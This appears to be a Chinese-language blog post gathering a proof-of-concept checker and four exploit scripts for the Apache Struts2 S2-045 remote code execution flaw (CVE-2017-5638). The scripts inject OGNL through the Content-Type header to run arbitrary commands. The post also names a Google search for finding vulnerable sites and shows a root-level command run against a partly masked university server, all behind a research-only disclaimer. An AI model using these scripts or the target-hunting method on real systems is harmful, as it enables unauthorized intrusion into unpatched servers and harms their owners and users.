申明:本文所介紹的腳本和方法均來自互聯網,收集的目的僅供安全研究使用,網站運維人員可以使用本文介紹的腳本和方法評估自身網站的安全性,並盡快發現和修復網站存在的漏洞。對於使用本文腳本和方法所造成的任何后果,由使用者自行承擔,作者不承擔任何后果。
S2-045漏洞為一個遠程RCE漏洞,利用該漏洞不需要任何的前提條件,因此危害巨大,估計又會造成一場腥風血雨。
漏洞POC如下:
import requests import sys def poc(url): payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}" headers = {} headers["Content-Type"] = payload r = requests.get(url, headers=headers) if "105059592" in r.content: return True return False if __name__ == '__main__': if len(sys.argv) == 1: print "python s2-045.py target" sys.exit() if poc(sys.argv[1]): print "vulnerable" else: print "not vulnerable"
利用代碼1
目前一個主要的漏洞利用EXP如下:
#!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." payload += "(#_memberAccess?" payload += "(#_memberAccess=#dm):" payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." payload += "(#ognlUtil.getExcludedPackageNames().clear())." payload += "(#ognlUtil.getExcludedClasses().clear())." payload += "(#context.setMemberAccess(#dm))))." payload += "(#cmd='%s')." % cmd payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." payload += "(#p=new java.lang.ProcessBuilder(#cmds))." payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." payload += "(#ros.flush())}" try: headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} request = urllib2.Request(url, headers=headers) page = urllib2.urlopen(request).read() except httplib.IncompleteRead, e: page = e.partial print(page) return page if __name__ == '__main__': import sys if len(sys.argv) != 3: print("[*] struts2_S2-045.py <url> <cmd>") else: print('[*] CVE: 2017-5638 - Apache Struts2 S2-045') url = sys.argv[1] cmd = sys.argv[2] print("[*] cmd: %s\n" % cmd) exploit(url, cmd)
怎樣尋找目標?太簡單了,用google hacking。在搜索引擎中尋找目標很簡單:inurl .action
目測目前80%以上的網站還沒有升級,因此找到的目標一測一個准:
root@kali64:/home/pentest# ./s2-045.py http://www.****.edu.cn/graduate.action "whoami" [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: whoami root
廣大的網站管理員們盡快行動起來吧,估計很多網站都已經被拿下了,如果目前你的網站還沒有被拿下,那么不需要恭喜你,因為那是你的網站價值不夠高 :)))
利用腳本2
#! /usr/bin/env python # encoding:utf-8 import urllib2 import sys from poster.encode import multipart_encode from poster.streaminghttp import register_openers def poc(): register_openers() datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")}) header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" request = urllib2.Request(str(sys.argv[1]),datagen,headers=header) response = urllib2.urlopen(request) print response.read() poc()
利用腳本3
#encoding:utf-8 import urllib2 from poster.encode import multipart_encode from poster.streaminghttp import register_openers def poc(w_url): cmd = raw_input('command \n') register_openers() datagen, header = multipart_encode({"image1": '23333'}) header[ "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header[ "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" request = urllib2.Request(w_url, datagen, headers=header) response = urllib2.urlopen(request).read() print(response) if __name__=='__main__': print 'blog : http://www.cuijianxiong.com' w_url = raw_input('addrs : \n') is_shutdown = 1 while is_shutdown == 1: poc(w_url)
利用代碼4
#!/usr/bin/env python #coding:utf8 #code by fuck@0day5.com import sys import requests requests.packages.urllib3.disable_warnings() def poccheck(url): result = False header = { 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36', 'Content-Type':"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println(88888888-23333+1222)).(#o.close())}" } try: response = requests.post(url,data='',headers=header,verify=False,allow_redirects = False) if response.content.find("88866777")!=-1: result = url+" find struts2-45" except Exception as e: print str(e) pass return result if __name__ == '__main__': if len(sys.argv) == 2: print poccheck(sys.argv[1]) sys.exit(0) else: print ("usage: %s http://www.baidu.com/vuln.action" % sys.argv[0]) sys.exit(-1)